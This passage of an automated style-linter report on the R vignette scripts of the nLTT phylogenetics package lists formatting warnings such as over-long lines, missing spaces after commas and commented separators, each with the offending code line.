^\n```\n[inst/doc/vignette_get_average_nltt.R:100:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L100) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_nltt_values.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:8:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L8) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L17) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L28) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:28:53:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L28) *style:* **Commas should always have a space after.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 1\")\n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:30:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L30) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:32:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L32) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:34:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L34) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:37:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L37) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:43:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 2\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:43:53:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L43) *style:* **Commas should always have a space after.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 2\")\n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:45:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L45) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:46:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L46) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:50:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L50) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:53:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L53) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:61:41:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L61) *style:* **Commas should always have a space after.**\n```r\n​t <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.2)\n                                        ^\n```\n[inst/doc/vignette_get_nltt_values.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:65:42:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L65) *style:* **Commas should always have a space after.**\n```r\n​df <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.01)\n                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:68:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L68) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:68:54:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L68) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:68:129:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:71:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L71) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:72:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:72:54:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L72) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:72:102:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:75:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L75) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:77:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L77) *style:* **lines should not be more than 80 characters.**\n```r\n​newick2 <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:82:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L82) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:84:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L84) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:86:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L86) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:89:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L89) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:93:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L93) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:95:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L95) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:97:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L97) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:100:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L100) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:104:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L104) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:105:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L105) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:108:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L108) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:109:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:112:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L112) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:116:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L116) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:117:41:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L117) *style:* **Commas should always have a space after.**\n```r\n​t <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.2)\n                                        ^\n```\n[inst/doc/vignette_get_nltt_values.R:120:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L120) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:121:42:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L121) *style:* **Commas should always have a space after.**\n```r\n​df <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.01)\n                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:123:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L123) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:124:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L124) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:124:54:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L124) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:124:129:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:127:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L127) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:128:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L128) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:128:54:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L128) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:128:102:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:131:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L131) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:140:53:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L140) *style:* **Trailing whitespace is superfluous.**\n```r\n​phylogenies <- c(phylogeny1, phylogeny2, phylogeny3, \n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:143:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L143) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:147:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L147) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:148:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L148) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:148:54:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L148) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:148:129:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L148) *style:* 